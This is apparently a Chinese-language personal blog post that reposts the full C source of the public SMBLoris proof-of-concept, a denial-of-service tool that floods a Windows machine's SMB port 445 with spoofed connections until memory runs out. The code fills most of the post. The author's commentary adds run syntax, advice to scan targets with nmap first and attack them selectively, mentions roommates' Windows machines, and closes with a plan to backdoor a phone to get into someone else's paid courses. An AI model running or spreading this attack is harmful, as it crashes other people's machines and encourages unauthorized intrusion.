又是一个周三
今天不知道写点什么= =
就搬运点东西吧~~~
具体就是题目
大多数Windows操作系统都会开启445 139此类的端口(比如我的几个室友)
所以说针对这个情况就有人写了一个脚本 专门针对SMB进行攻击
原PO见https://twitter.com/marcan42/status/892706927720808449 (有条件的看一下)
脚本github地址 https://gist.github.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e
/* SMBLoris attack proof-of-concept
*
* Copyright 2017 Hector Martin "marcan"
*
* Licensed under the terms of the 2-clause BSD license.
*
* This is a proof of concept of a publicly disclosed vulnerability.
* Please do not go around randomly DoSing people with it.
*
* Tips: do not use your local IP as source, or if you do, use iptables to block
* outbound RST packets. You may want to increase your local conntrack limit:
* echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define CHECK(cond, name) if (cond) { perror(name); exit(1); }
#define MIN_PORT 1
#define MAX_PORT 65535
struct {
char *iface;
uint8_t hwaddr[6];
uint32_t src_min;
uint32_t src_max;
uint32_t dst;
struct sockaddr_in dst_sa;
} cfg;
static void usage(const char *argv0) {
fprintf(stderr, "Usage: %s \n", argv0);
exit(1);
}
uint32_t parse_ip(const char *s) {
int a,b,c,d;
if (sscanf(s, "%d.%d.%d.%d", &a, &b, &c, &d) != 4) {
fprintf(stderr, "Failed to parse IPv4 address %s\n", s);
exit(1);
}
return (a<<24) | (b<<16) | (c<<8) | d;
}
uint16_t fold(uint32_t v) {
return (v & 0xffff) + (v >> 16);
}
uint32_t csum(void *buf, int len)
{
uint32_t s = 0;
uint16_t *p = buf;
while (len) {
s += *p++;
len -= 2;
}
return s;
}
void get_hwaddr(const char *iface, uint8_t *hwaddr)
{
int sock = socket(PF_INET, SOCK_PACKET, htons(ETH_P_ARP));
CHECK(sock < 0, "socket(PF_INET, SOCK_PACKET, ETH_P_ARP)");
struct ifreq req;
strncpy(req.ifr_name, iface, sizeof(req.ifr_name));
CHECK(ioctl(sock, SIOCGIFHWADDR, &req) < 0, "ioctl(SIOCGIFHWADDR)");
memcpy(cfg.hwaddr, req.ifr_hwaddr.sa_data, 6);
close(sock);
}
void send_arp(uint32_t addr)
{
struct sockaddr sa;
strncpy(sa.sa_data, cfg.iface, sizeof(sa.sa_data));
struct {
struct ether_header eth;
struct arphdr arp;
uint8_t ar_sha[6];
uint32_t ar_sip;
uint8_t ar_tha[6];
uint32_t ar_tip;
} __attribute__((packed)) pkt;
memset(&pkt, 0, sizeof(pkt));
memset(&pkt.eth.ether_dhost, 0xff, 6);
memcpy(&pkt.eth.ether_shost, cfg.hwaddr, 6);
pkt.eth.ether_type = htons(ETHERTYPE_ARP);
pkt.arp.ar_hrd = htons(1);
pkt.arp.ar_pro = htons(ETH_P_IP);
pkt.arp.ar_hln = 6;
pkt.arp.ar_pln = 4;
pkt.arp.ar_op = htons(ARPOP_REQUEST);
memcpy(pkt.ar_sha, cfg.hwaddr, ETH_ALEN);
pkt.ar_sip = htonl(addr);
memset(pkt.ar_tha, 0xff, ETH_ALEN);
pkt.ar_tip = htonl(addr);
int sock = socket(PF_INET, SOCK_PACKET, htons(ETH_P_ARP));
CHECK (sock < 0, "socket(PF_INET, SOCK_PACKET, ETH_P_ARP)");
CHECK(sendto(sock, &pkt, sizeof(pkt), 0, &sa, sizeof(sa)) < 0, "sendto(gratuitous ARP)");
close(sock);
}
int sent_packets = 0, errors = 0, replies = 0, rsts = 0, last_errno = 0;
void process_replies(int sock, int rsock)
{
struct {
struct iphdr ip;
struct tcphdr tcp;
uint8_t data[32];
} reply;
while (1) {
int ret = recv(rsock, &reply, sizeof(reply), 0);
if (ret < 0 && errno == EAGAIN)
return;
CHECK(ret < 0, "recv");
if (reply.ip.saddr != htonl(cfg.dst))
continue;
if (ntohl(reply.ip.daddr) < cfg.src_min ||
ntohl(reply.ip.daddr) > cfg.src_max)
continue;
if (reply.ip.protocol != IPPROTO_TCP || reply.tcp.source != htons(445))
continue;
if (reply.tcp.rst || reply.tcp.fin) {
rsts++;
continue;
}
if (!reply.tcp.ack || !reply.tcp.syn)
continue;
struct {
struct iphdr ip;
struct tcphdr tcp;
uint8_t payload[4];
} __attribute__((packed)) pkt;
memset(&pkt, 0, sizeof(pkt));
pkt.ip.ihl = 5;
pkt.ip.version = 4;
pkt.ip.ttl = 128;
pkt.ip.protocol = IPPROTO_TCP;
pkt.ip.saddr = reply.ip.daddr;
pkt.ip.daddr = htonl(cfg.dst);
pkt.tcp.dest = htons(445);
pkt.tcp.source = reply.tcp.dest;
pkt.tcp.doff = 5;
pkt.tcp.window = htons(5840);
pkt.tcp.ack = 1;
pkt.tcp.ack_seq = htonl(ntohl(reply.tcp.seq) + 1);
pkt.tcp.seq = reply.tcp.ack_seq;
memcpy(pkt.payload, "\x00\x01\xff\xff", 4);
uint32_t sum = csum(&pkt.ip.saddr, 8) + htons(IPPROTO_TCP) + htons(sizeof(struct tcphdr) + 4) + csum(&pkt.tcp, sizeof(struct tcphdr) + 4);
pkt.tcp.check = 0xffff - fold(sum);
if (pkt.tcp.check == 0)
pkt.tcp.check = 0xffff;
ret = sendto(sock, &pkt, sizeof pkt, 0, (struct sockaddr*)&cfg.dst_sa, sizeof(cfg.dst_sa));
if (ret < 0) {
errors++;
last_errno = errno;
} else {
replies++;
}
}
}
int main(int argc, char **argv)
{
if (argc != 5) {
usage(argv[0]);
}
cfg.iface = argv[1];
cfg.src_min = parse_ip(argv[2]);
cfg.src_max = parse_ip(argv[3]);
cfg.dst = parse_ip(argv[4]);
get_hwaddr(cfg.iface, cfg.hwaddr);
fprintf(stderr, "Local MAC address: %02x:%02x:%02x:%02x:%02x:%02x\n",
cfg.hwaddr[0], cfg.hwaddr[1], cfg.hwaddr[2],
cfg.hwaddr[3], cfg.hwaddr[4], cfg.hwaddr[5]);
int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
CHECK(sock < 0, "socket(AF_INET, SOCK_RAW, IPPROTO_RAW)");
int rsock = socket(AF_PACKET, SOCK_DGRAM | SOCK_NONBLOCK, htons(ETH_P_IP));
CHECK(rsock < 0, "socket(AF_INET, SOCK_DGRAM, ETH_P_IP)");
struct {
struct iphdr ip;
struct tcphdr tcp;
} __attribute__((packed)) pkt;
memset(&pkt, 0, sizeof(pkt));
pkt.ip.ihl = 5;
pkt.ip.version = 4;
pkt.ip.ttl = 128;
pkt.ip.protocol = IPPROTO_TCP;
pkt.ip.daddr = htonl(cfg.dst);
pkt.tcp.dest = htons(445);
pkt.tcp.doff = 5;
pkt.tcp.window = htons(5840);
pkt.tcp.syn = 1;
memset(&cfg.dst_sa, 0, sizeof(cfg.dst_sa));
cfg.dst_sa.sin_family = AF_INET;
cfg.dst_sa.sin_port = 0;
cfg.dst_sa.sin_addr.s_addr = htonl(cfg.dst);
uint32_t src;
int port;
for (src = cfg.src_min; src <= cfg.src_max; src++) {
pkt.ip.saddr = htonl(src);
pkt.tcp.source = 0;
pkt.tcp.check = 0;
uint32_t sum = csum(&pkt.ip.saddr, 8) + htons(IPPROTO_TCP) + htons(sizeof(struct tcphdr)) + csum(&pkt.tcp, sizeof(struct tcphdr));
send_arp(src);
for (port = MIN_PORT; port <= MAX_PORT; port++) {
pkt.tcp.source = htons(port);
pkt.tcp.check = 0xffff - fold(sum + htons(port));
if (pkt.tcp.check == 0)
pkt.tcp.check = 0xffff;
int ret = sendto(sock, &pkt, sizeof pkt, 0, (struct sockaddr*)&cfg.dst_sa, sizeof(cfg.dst_sa));
if (ret < 0) {
errors++;
last_errno = errno;
}
sent_packets++;
if (sent_packets % 100 == 0) {
fprintf(stderr, "\r%08x:%04x %d sent, %d errors (%d), %d replies, %d resets", src, port, sent_packets, errors, last_errno, replies, rsts);
send_arp(src);
}
process_replies(sock, rsock);
}
}
fprintf(stderr, "\n");
return 0;
}
我们编译一下
下面是格式 ./win10smb 网络接口 起始IP 终止IP 发起地址(作者说了不要用自己的IP)
这里就不做攻击示范了 哈哈哈哈
不过使用之前一定要用nmap 扫描一下 看看哪台主机开了445端口 有针对的打
效果明显 很快靶机的内存就会急剧升高直到死机(如果有这个漏洞的话)
等下准备一下给自己手机装一个后门 过几天要去偷偷蹭别人家付费的课(没钱真可怕)